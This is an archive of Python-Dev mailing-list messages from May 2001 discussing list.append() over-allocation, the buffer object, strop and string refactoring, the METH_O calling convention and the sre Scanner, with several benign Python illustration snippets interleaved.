> > > Then you could write: buffer(ob).find('.').
> >
> > You're totally missing the point with that suggestion. It does *not*
> > suffice to add them to buffer objects. What about array objects? mmap
> > objects?  Random Joe Object who implements the buffer interface?
> 
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

Sounds like you are trying to make the buffer object into something it
is not. Not that I have the foggiest idea what it is now, since it
hasn't much use and is badly broken.

I like your idea of sharing functions, I just don't think the buffer
object is the proper means.  I think the buffer object should be
removed from Python and something better put in its place. (I'm not
talking about the buffer C/API, though this could also use an
overhaul, since it doesn't provide enough information to the receiving
method.)

What I think we need is:

1) a malloc object which has a similar interface to the mmap object
with access protection, etc.  This object would be the fundamental way
of getting memory.  The string object would use it to allocate a chunk
of 'read-only' memory.  Other objects would then know not to modify
the contents of the memory.  If you wanted a reference or view of the
memory/buffer, you would get a reference to this object.

2) objects supporting the buffer object should provide a view method
which returns a copy of themselves (and hence all their methods) and
can be used to get a pointer to a subset of its memory.  In this way
the type of memory/buffer being accessed is known compared to the
current buffer object which only indicates the buffer is binary or
char data.  In essence information about how the buffer should be used
is lost in the current buffer C/API.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From guido@digicool.com  Fri May 25 15:29:28 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 25 May 2001 10:29:28 -0400
Subject: [Python-Dev] Vacation
Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com>

I will be on vacation next week without net access.  Back on June 4th!

There's a bunch of stuff that happened on the mailing list that I
expect I won't get to -- I've got to finish up some high priority
work for Digital Creations before I can leave.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Fri May 25 20:06:16 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 25 May 2001 15:06:16 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>

c.l.py has rediscovered the quadratic-time worst-case behavior of
list.append().  That is, do list.append(x) in a long loop.  Linux users
don't see anything particularly bad no matter how big the loop.  WinNT
eventually displays clear quadratic-time behavior.  Win9x dies
surprisingly early with a MemoryError, despite gobs of memory free:
turns out Win9x allocates hundreds of virtual heaps, isn't able to
coalesce them, and you actually run out of *address space* (the whole
2GB user space gets fragmented beyond hope).  People on other platforms
have reported other bad behaviors over the years.

I don't want to argue about this again <wink>, I just want to know
whether the patch below slows anything down on your oddball box.  It
increases the over-allocation amount in several more layers.  Also
replaces integer * and / in the over-allocation computation by bit
operations (integer / in particular is very slow on *some* boxes).

Long-term we should teach PyMalloc about Python's realloc() abuses and
craft a cooperative solution.

Index: Objects/listobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v
retrieving revision 2.92
diff -c -r2.92 listobject.c
*** Objects/listobject.c	2001/02/12 22:06:02	2.92
--- Objects/listobject.c	2001/05/25 19:04:07
***************
*** 9,24 ****
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, PyTryBlock) \
! 	((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock))

  static int
  roundupsize(int n)
  {
! 	if (n < 500)
  		return ROUNDUP(n, 10);
  	else
! 		return ROUNDUP(n, 100);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
--- 9,30 ----
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, nbits) \
! 	( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) )

  static int
  roundupsize(int n)
  {
! 	if ((n >> 9) == 0)
! 		return ROUNDUP(n, 3);
! 	else if ((n >> 13) == 0)
! 		return ROUNDUP(n, 7);
! 	else if ((n >> 17) == 0)
  		return ROUNDUP(n, 10);
+ 	else if ((n >> 20) == 0)
+ 		return ROUNDUP(n, 13);
  	else
! 		return ROUNDUP(n, 18);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
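A direct Python transcription of the old and new roundupsize() from the
patch, to make the bit operations easier to read: the new version rounds
up to a multiple of 8 below 512 elements, of 128 below 8192, of 1024
below 131072 (2**17), of 8192 below 2**20, and of 262144 beyond that.
Counting the distinct rounded sizes over a run of appends gives a rough
idea of how much less often the requested allocation size changes.

```python
def roundup_div(n, block):
    # Old ROUNDUP: round n up to a multiple of block using * and /.
    return (n + block - 1) // block * block

def roundupsize_old(n):
    return roundup_div(n, 10) if n < 500 else roundup_div(n, 100)

def roundup_bits(n, nbits):
    # New ROUNDUP: round n up to a multiple of 2**nbits with shifts only.
    return ((n + (1 << nbits) - 1) >> nbits) << nbits

def roundupsize_new(n):
    if n >> 9 == 0:        # n < 512
        return roundup_bits(n, 3)
    elif n >> 13 == 0:     # n < 8192
        return roundup_bits(n, 7)
    elif n >> 17 == 0:     # n < 131072
        return roundup_bits(n, 10)
    elif n >> 20 == 0:     # n < 1048576
        return roundup_bits(n, 13)
    else:
        return roundup_bits(n, 18)

def distinct_sizes(roundup, n_items):
    """Number of different allocation sizes seen while appending n_items."""
    return len({roundup(n) for n in range(1, n_items + 1)})

print(distinct_sizes(roundupsize_old, 100000),
      distinct_sizes(roundupsize_new, 100000))
```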


From martin@loewis.home.cs.tu-berlin.de  Fri May 25 20:51:26 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 21:51:26 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com>
Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>

> Now this would be more flexible if you would implement a scheme
> which lets us put the parser string into the method list. The
> call mechanism could then easily figure out how to call the
> method and it would also be more easily extensible:
> 
>  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

I'd like to hear other people's comment on this specific issue, so I
guess I should probably write a PEP outlining the options.

My immediate reaction to your proposal is that it only complicates the
interface without any savings. We still can only support a limited
number of calling conventions. E.g. it is not possible to write
portable C code that does all the calling conventions for "l", "ll",
"lll", "llll", and so on - you have to cast the function pointer to
the right prototype, which must be done in source code.

So with this interface, you may end up at run-time finding out that
you cannot support the signature. With the current patch, you'd have
to know to convert "OO" into METH_OO, which I think is not asked too
much - and it gives you a compile-time error if you use an unsupported
calling convention.

> A parser marker "OO" would then call a method like this:
> 
>  method(self, arg0, arg1)
> 
> and so on.

That is indeed the plan, but since you have to code the parameter
combinations in C code, you can only support so many of them.

> allows implementing a generic scheme which
> then again relies on PyArg_ParseTuple() to do the argument
> parsing, e.g. "is#" could be implemented as:

The point of the patch is to get rid of PyArg_ParseTuple in the
"common case". For functions with complex calling conventions, getting
rid of the PyArg_ParseTuple string parsing is not that important,
since they are expensive, anyway (not that "is#" couldn't be
supported, I'd call it METH_is_hash).

> For optional arguments we'd need some convention which then
> lets the called function add the default value as needed.

For the moment, I'd only support "|O", and perhaps "|z"; an omitted
argument would be represented as a NULL pointer. That means that "|i"
couldn't participate in the fast calling convention - unless we
translate that to

void foo(PyObject*self, int i, bool ipresent);

BTW, the most frequent function in my measurements that would make use
of this convention is "OO|i:replace", which scores at 4.5%.

Regards,
Martin


From gstein@lyra.org  Fri May 25 21:27:52 2001
From: gstein@lyra.org (Greg Stein)
Date: Fri, 25 May 2001 13:27:52 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E5C50.6E365F69@STScI.Edu>; from Barrett@stsci.edu on Fri, May 25, 2001 at 09:21:20AM -0400
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu>
Message-ID: <20010525132752.B5402@lyra.org>

On Fri, May 25, 2001 at 09:21:20AM -0400, Paul Barrett wrote:
> "M.-A. Lemburg" wrote:
> > 
> > > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > > Then you could write: buffer(ob).find('.').
> > >
> > > You're totally missing the point with that suggestion. It does *not*
> > > suffice to add them to buffer objects. What about array objects? mmap
> > > objects?  Random Joe Object who implements the buffer interface?
> > 
> > That's the point: you can wrap all those into a buffer object
> > and then use the buffer object methods to manipulate them. In
> > that sense, buffer objects provide an adaptor to the underlying
> > object which implements the needed methods.
> 
> Sounds like you are trying to make the buffer object into something it
> is not.

The buffer object is intended to provide a Python-level object (with methods
and behavior) for any other object which exports the buffer API (but not
those particular methods/behavior).

It was added for Python 1.5.2, but did not keep up with the methods added to
the string object. Arguably, it is out of date rather than "[turning it
into] something it is not."

> Not that I have the foggiest idea what it is now, since it
> hasn't much use and is badly broken.

"badly" is overstating the problem. It caches a pointer when it shouldn't.
This doesn't work well when using it with array objects or PIL's image
objects. For most objects, it is fine.

The buffer object is also very good for C/Python extensions and embedding
code. It provides a Python-level view on a block of memory. Using a string
object implies making a copy, and it removes the possibility for read/write
access to that memory.
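For comparison, a sketch using memoryview, which Python 3 provides in
place of the buffer object (it was also backported to 2.7): it gives a
no-copy, writable view on another object's memory, unlike bytes(),
which copies.  While the view exists, a bytearray refuses to resize
itself, which is one way the stale-pointer problem is avoided.

```python
data = bytearray(b"hello world")

view = memoryview(data)     # no copy: shares data's memory
copy = bytes(data)          # an independent copy

view[0:5] = b"HELLO"        # writing through the view...
print(data)                 # ...is visible in the original
print(copy)                 # ...but not in the copy

# While the view exists, the bytearray refuses to resize, so the view
# can never be left pointing at memory that has been moved or freed.
resize_blocked = False
try:
    data.extend(b"!")
except BufferError:
    resize_blocked = True

view.release()              # drop the export...
data.extend(b"!")           # ...and resizing works again
```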

And you state: "Not that I have the foggiest idea what it is now". If so,
then wtf are you making statements about the buffer object's behavior?

> I like your idea of sharing functions, I just don't think the buffer
> object is the proper means.  I think the buffer object should be
> removed from Python and something better put in its place. (I'm not
> talking about the buffer C/API, though this could also use an
> overhaul, since it doesn't provide enough information to the receiving
> method.)
> 
> What I think we need is:
> 
> 1) a malloc object which has a similar interface to the mmap object
> with access protection, etc.  This object would be the fundamental way
> of getting memory.  The string object would use it to allocate a chunk
> of 'read-only' memory.  Other objects would then know not to modify
> the contents of the memory.  If you wanted a reference or view of the
> memory/buffer, you would get a reference to this object.

You're talking about the buffer object that we have *today*.

It can refer to another object (i.e. the memory exposed via the other
object's buffer API), refer to memory, or it can allocate its own memory.
The buffer object can be marked read-only, or read-write.

> 2) objects supporting the buffer object should provide a view method
> which returns a copy of themselves (and hence all their methods) and
> can be used to get a pointer to a subset of its memory.  In this way
> the type of memory/buffer being accessed is known compared to the
> current buffer object which only indicates the buffer is binary or
> char data.  In essence information about how the buffer should be used
> is lost in the current buffer C/API.

I'm not sure that I understand this paragraph.


No... what needs to happen is to have the bug in PyBufferObject fixed. Then
to refactor stringobject.c and stropmodule.c to move all of those
byte-oriented processing functions into a new file such as Python/byteops.c
(whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
would be simple covers over the same functions.

Those functions can then be used by PyBufferObject to implement the rest of
the string methods on itself.


This would leave us at MAL's suggested point: via the buffer object, we can
perform all of the standard string methods/ops on any object that implements
the buffer API.
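A rough Python sketch of that refactoring, with a hypothetical
byteops_find() standing in for a shared C routine: it works on any
object exporting the buffer protocol without copying it, so string-like
and buffer-like types could be thin covers over the same code.  It is a
naive O(n*m) search, chosen for clarity rather than speed.

```python
from array import array

def byteops_find(data, sub, start=0):
    """Naive find over any buffer-protocol object, without copying it."""
    view = memoryview(data).cast("B")   # treat the memory as raw bytes
    pat = memoryview(sub).cast("B")
    n, m = len(view), len(pat)
    for i in range(start, n - m + 1):
        if view[i:i + m] == pat:
            return i
    return -1

# One shared routine serving several object types.
print(byteops_find(b"spam.eggs", b"."))            # bytes
print(byteops_find(bytearray(b"a.b"), b"."))       # bytearray
print(byteops_find(array("B", b"xyz."), b"."))     # array
```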

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal@lemburg.com  Fri May 25 22:16:32 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:16:32 +0200
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>
Message-ID: <3B0ECBB0.6798F4AB@lemburg.com>

Tim Peters wrote:
> 
> Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

That's what I think too. There's really not much point in trying
to work around poor malloc() implementations when we've already
got the cure built into Python... I just wish Vladimir would 
resurface again to complete his great work (AFAIK, pymalloc still
has problems with threads).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May 25 22:38:15 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 23:38:15 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
Message-ID: <3B0ED0C7.F1A665EA@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Now this would be more flexible if you would implement a scheme
> > which lets us put the parser string into the method list. The
> > call mechanism could then easily figure out how to call the
> > method and it would also be more easily extensible:
> >
> >  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},
> 
> I'd like to hear other people's comment on this specific issue, so I
> guess I should probably write a PEP outlining the options.
> 
> My immediate reaction to your proposal is that it only complicates the
> interface without any savings. We still can only support a limited
> number of calling conventions. E.g. it is not possible to write
> portable C code that does all the calling conventions for "l", "ll",
> "lll", "llll", and so on - you have to cast the function pointer to
> the right prototype, which must be done in source code.
>
> So with this interface, you may end up at run-time finding out that
> you cannot support the signature. With the current patch, you'd have
> to know to convert "OO" into METH_OO, which I think is not asked too
> much - and it gives you a compile-time error if you use an unsupported
> calling convention.

True. It's unfortunate that C doesn't offer the reverse of
varargs.h...
 
> > A parser marker "OO" would then call a method like this:
> >
> >  method(self, arg0, arg1)
> >
> > and so on.
> 
> That is indeed the plan, but since you have to code the parameter
> combinations in C code, you can only support so many of them.
> 
> > allows implementing a generic scheme which
> > then again relies on PyArg_ParseTuple() to do the argument
> > parsing, e.g. "is#" could be implemented as:
> 
> The point of the patch is to get rid of PyArg_ParseTuple in the
> "common case". For functions with complex calling conventions, getting
> rid of the PyArg_ParseTuple string parsing is not that important,
> since they are expensive, anyway (not that "is#" couldn't be
> supported, I'd call it METH_is_hash).
> 
> > For optional arguments we'd need some convention which then
> > lets the called function add the default value as needed.
> 
> For the moment, I'd only support "|O", and perhaps "|z"; an omitted
> argument would be represented as a NULL pointer. That means that "|i"
> couldn't participate in the fast calling convention - unless we
> translate that to
> 
> void foo(PyObject*self, int i, bool ipresent);
> 
> BTW, the most frequent function in my measurements that would make use
> of this convention is "OO|i:replace", which scores at 4.5%.

I was thinking of using pointer indirection for this:

	foo(PyObject *self, int *i)

If i is given as argument, *i is set to the value, otherwise
i is set to NULL.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one@home.com  Fri May 25 23:11:43 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 25 May 2001 18:11:43 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEIMKEAA.tim.one@home.com>

[Tim]
> Long-term we should teach PyMalloc about Python's realloc()
> abuses and craft a cooperative solution.

[MAL]
> That's what I think too. There's really not much point in trying
> to work around poor malloc() implementations when we've already
> got the cure built into Python...

The point *here* is that a simple localized patch could kill off a
Frequently Irritating Complaint without further ado:  on my personal
cost/benefit scale, it's all I can *afford* to do now.  PyMalloc likely
won't solve it as-is x-platform, without new work to accommodate extreme
realloc() abuse.

> I just wish Vladimir would resurface again to complete his great
> work

I'd like him to come back even if he doesn't <wink>.

> (AFAIK, pymalloc still has problems with threads).

It has lock macros that haven't been #define'd to do anything yet.  But part
of the potential value of the Python core using its own allocator is to
exploit the global interpreter lock to *not* lock in the allocator.  Messy
issues.  Python should grow a cheaper platform-specific flavor of internal
lock too.  (Jeremy pointed out some code the other day that jumps through
hoops to simulate a reentrant lock on top of a Python lock; an irony is that
on Windows, the native lock *is* reentrant already, and Python jumps through
hoops to make it act as if it weren't <wink>)
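The usual way to build a reentrant lock on top of a non-reentrant one is to track the owning thread and a recursion count. Below is a minimal Python 3 sketch that uses threading.Lock as the primitive. The class name is made up. Modern Python ships threading.RLock, so this is for illustration only.

```python
import threading


class ReentrantLock:
    """Hypothetical reentrant lock layered on a plain threading.Lock."""

    def __init__(self):
        self._lock = threading.Lock()   # the non-reentrant primitive
        self._owner = None              # ident of the thread holding it
        self._count = 0                 # how many times the owner acquired it

    def acquire(self):
        me = threading.get_ident()
        if self._owner == me:           # already ours: just bump the count
            self._count += 1
            return
        self._lock.acquire()            # blocks while another thread holds it
        self._owner = me
        self._count = 1

    def release(self):
        if self._owner != threading.get_ident():
            raise RuntimeError("release of un-acquired lock")
        self._count -= 1
        if self._count == 0:            # last release frees the real lock
            self._owner = None
            self._lock.release()

    def locked(self):
        return self._lock.locked()
```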


From mal@lemburg.com  Fri May 25 23:07:00 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 00:07:00 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org>
Message-ID: <3B0ED784.FC53D01@lemburg.com>

Greg Stein wrote:
> 
> No... what needs to happen is to have the bug in PyBufferObject fixed. Then
> to refactor stringobject.c and stropmodule.c to move all of those
> byte-oriented processing functions into a new file such as Python/byteops.c
> (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c
> would be simple covers over the same functions.
> 
> Those functions can then be used by PyBufferObject to implement the rest of
> the string methods on itself.
> 
> This would leave us at MAL's suggested point: via the buffer object, we can
> perform all of the standard string methods/ops on any object that implements
> the buffer API.

I wonder how we could achieve this without copy&pasting all
the needed methods from stringobject.c to bufferobject.c:
all the string methods use the string object layout directly
rather than just dealing with a pointer and a length.

-- 
Marc-Andre Lemburg


From m.favas@per.dem.csiro.au  Sat May 26 03:34:20 2001
From: m.favas@per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 10:34:20 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au>

[Tim wants to know whether his patch to listobject.c slows anything down
on anyone's "oddball box"...]

While in no way admitting that mine is an oddball box <wink>, it being a
Tru64 Unix alpha processor machine, I do see a slowdown after applying
the patch (measured on the test suite and on pystone). However, it's
only of the order of 0.5 to 1%.

slightly-oddly y'rs  - Mark

-- 
Mark Favas  -   m.favas@per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From tim.one@home.com  Sat May 26 05:05:40 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 26 May 2001 00:05:40 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>

[Mark Favas]
> [Tim wants to know whether his patch to listobject.c slows anything down
> on anyone's "oddball box"...]
>
> While in no way admitting that mine is an oddball box <wink>,

Heh -- of course not.  I had more in mind obscure OSes like Linux <wink>.

> it being a Tru64 Unix alpha processor machine, I do see a slowdown
> after applying the patch (measured on the test suite and on pystone).
> However, it's only of the order of 0.5 to 1%.

Now that's very odd, since Alpha has about the slowest integer division on
Earth, and every list append was doing an int div before the patch but not
after.

I'm afraid that timing the test suite before and after is a red herring, as
several of the expensive tests have (pseudo)random components and can do an
amount of work that varies depending on system time at the time random.py is
first imported.

pystone is even odder:  the relevant code in listobject.c is never executed
during pystone!  I suspected that because pystone is an old synthetic Ada
benchmark simulating a pile of integer systems programs, so pystone is
unique among Python programs in not exercising any of Python's useful
features <wink> -- a breakpoint in the debugger just now confirmed it (never
did a list resize after compilation finished).

So I'm pretty sure that after I check it in, you'll see a speedup instead
<wink>.

Get anywhere identifying why your other app is 20% slower (blast from the
past)?


From martin@loewis.home.cs.tu-berlin.de  Sat May 26 06:28:32 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 26 May 2001 07:28:32 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com>
Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>

> I was thinking of using pointer indirection for this:
> 
> 	foo(PyObject *self, int *i)
> 
> If i is given as argument, *i is set to the value, otherwise
> i is set to NULL.

That is a good idea; I'll try to update my patch to more calling
conventions.

Regards,
Martin


From tim.one@home.com  Sat May 26 07:44:04 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 26 May 2001 02:44:04 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0ED784.FC53D01@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>

The buffer object has been neglected for years:  is that because it's in
prime shape, or because nobody cares about it enough to maintain it?  "The
bug" has been known for years without any action taken to address it; the
docs give up in spots and nobody addresses that either (like "The current
policy seems to state that these characters may be multi-byte characters" --
well, yes or no?); the builtin buffer() function isn't called anywhere in
the std test suite; the file object still has an undocumented readinto()
method that just confuses people who bump into it; and it's so obscure in
daily life that it appears Guido didn't even think of it when adding
iterators for the other sequence types.

I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
champion it now?  That would be cool.

About combining strop and buffers and strings, don't forget unicodeobject.c:
that's got oodles of basically duplicate code too.  /F suggested dealing
with the minor differences via maintaining one code file that gets compiled
multiple times w/ appropriate #defines.


From tim.one@home.com  Sat May 26 09:14:06 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 26 May 2001 04:14:06 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>

I don't want to see us duplicate the guts of PyArg_ParseTuple() inside
do_call_special().  METH_O is a cool idea, METH_l is marginal, and the new
code is already slower for METH_O than it needs to be in order to support
the *possibility* of METH_l too (stacks and loops and switch stmts and an
extra layer of do_call_special function call "just in case").

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend <wink>.
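The following small Python model shows what METH_O buys. It is not the real ceval.c code. METH_VARARGS uses the value from methodobject.c that is quoted later in this thread. The METH_O value is a placeholder chosen for the sketch.

```python
METH_VARARGS = 0x0001   # value as quoted from methodobject.c
METH_O = 0x0008         # placeholder value for this sketch


def call_cfunction(func, flags, self_obj, args):
    """Model of dispatching on a method-table entry's flags."""
    if flags == METH_O:
        # Fast path: exactly one argument, handed over directly;
        # no tuple is built and no format string is parsed.
        if len(args) != 1:
            raise TypeError("function takes exactly one argument (%d given)"
                            % len(args))
        return func(self_obj, args[0])
    if flags == METH_VARARGS:
        # General path: pack into a tuple; the callee unpacks it
        # itself (in C, via PyArg_ParseTuple).
        return func(self_obj, tuple(args))
    raise ValueError("flags %#x not modelled in this sketch" % flags)


def len_varargs(self_obj, args):
    # Stand-in for PyArg_ParseTuple(args, "O:len", &v).
    if len(args) != 1:
        raise TypeError("len() takes exactly 1 argument (%d given)" % len(args))
    (v,) = args
    return len(v)


def len_o(self_obj, v):
    # METH_O version: the single argument arrives unwrapped.
    return len(v)
```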

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


From m.favas@per.dem.csiro.au  Sat May 26 09:30:29 2001
From: m.favas@per.dem.csiro.au (Mark Favas)
Date: Sat, 26 May 2001 16:30:29 +0800
Subject: [Python-Dev] Time for the yearly list.append() panic
References: <LNBBLJKPBEHFEDALKOLCKEJAKEAA.tim.one@home.com>
Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au>

[Tim tells Mark that his observations reflect more Brownian motion
(pseudo!) than reality...]

> [Mark Favas]
> > it being a Tru64 Unix alpha processor machine, I do see a slowdown
> > after applying the patch (measured on the test suite and on pystone).
> > However, it's only of the order of 0.5 to 1%.
> 
> Now that's very odd, since Alpha has about the slowest integer division on
> Earth, and every list append was doing an int div before the patch but not
> after.
> 
> I'm afraid that timing the test suite before and after is a red herring, as
> several of the expensive tests have (pseudo)random components and can do an
> amount of work that varies depending on system time at the time random.py is
> first imported.
> 
> pystone is even odder:  the relevant code in listobject.c is never executed
> during pystone!  I suspected that because pystone is an old synthetic Ada
> benchmark simulating a pile of integer systems programs, so pystone is
> unique among Python programs in not exercising any of Python's useful
> features <wink> -- a breakpoint in the debugger just now confirmed it (never
> did a list resize after compilation finished).
> 
> So I'm pretty sure that after I check it in, you'll see a speedup instead
> <wink>.

OK <grin>: this time, instead of making unwarranted assumptions about
test suites and pystones <wink>, I wrote and ran a test that I _think_
should exercise the code (at least, it does lots of list.append()s),
and, yes, the newly checked-in code's about 3-4% faster compared with
the original version of, well, days ago.
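A targeted benchmark like this one can be sketched with the timeit module, which entered the standard library later, in Python 2.3. It times nothing but appends, so the randomized parts of the test suite cannot skew it. The list size and repeat count are arbitrary choices.

```python
import timeit


def time_appends(n=100000, repeat=5):
    """Best-of-`repeat` time, in seconds, to append n ints to a fresh list."""
    def build():
        lst = []
        append = lst.append       # hoist the method lookup out of the loop
        for i in range(n):
            append(i)
        return lst
    # Taking the minimum over several runs reduces scheduling noise.
    return min(timeit.repeat(build, number=1, repeat=repeat))
```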

> 
> Get anywhere identifying why your other app is 20% slower (blast from the
> past)?

No, not yet. The profiling results at first eyeball seemed hard to match
up, so I put it off for a rainy weekend. And Perth's drought has just
broken... Will attempt to make sense of it. Interesting that Marc-Andre
seemed to get a somewhat similar slowdown between 1.52 and 2.0.

-- 
Mark Favas  -   m.favas@per.dem.csiro.au


From mal@lemburg.com  Sat May 26 10:54:12 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 11:54:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
Message-ID: <3B0F7D44.1A12CE0F@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > I was thinking of using pointer indirection for this:
> >
> >       foo(PyObject *self, int *i)
> >
> > If i is given as argument, *i is set to the value, otherwise
> > i is set to NULL.
> 
> That is a good idea; I'll try to update my patch to more calling
> conventions.

This morning another idea popped up which could help us with
handling generic calling schemes:

	How about making *all* parameters pointers ?!

The calling mechanism would then just have to deal with a
changing number of parameters and not with different types
(this is how PyArg_ParseTuple() works too if I remember correctly).

We could easily provide calling schemes for 1 to n arguments
that way and the types of these arguments would be defined
by the parser string just like before.

Examples:

	foo(PyObject *self, PyObject *obj, int *i)
	bar(PyObject *self, int *i, int *j, char *txt, int *len)

To call these, the calling mechanism would have to cast these
to:

	foo(void *, void *, void *)
	bar(void *, void *, void *, void *, void *)

Wouldn't this work ?

-- 
Marc-Andre Lemburg


From paulp@ActiveState.com  Sat May 26 16:02:08 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Sat, 26 May 2001 08:02:08 -0700
Subject: [Python-Dev] Scanner
Message-ID: <3B0FC570.17707787@ActiveState.com>

Whatever happened to the sre Scanner? It seemed like a good idea but it
was not documented and it doesn't work for me. Is it just a case of
nobody got around to the documentation or have we decided against it?

Here's the code that doesn't work for me:

from sre import Scanner

scanner = Scanner([
    (r"[a-zA-Z_]\w*", None),
    (r"\d+\.\d*", None),
    (r"\d+", None),
    (r"=|\+|-|\*|/", None),
    (r"\s+", None),
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")

Traceback (most recent call last):
  File "junk.py", line 11, in ?
    tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
  File "c:\program files\python21\lib\sre.py", line 254, in scan
    action = self.lexicon[m.lastindex][1]
TypeError: sequence index must be integer

m.lastindex is None
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mal@lemburg.com  Sat May 26 16:47:47 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 17:47:47 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <3B0FD023.C4588919@lemburg.com>

Tim Peters wrote:
> 
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?  "The
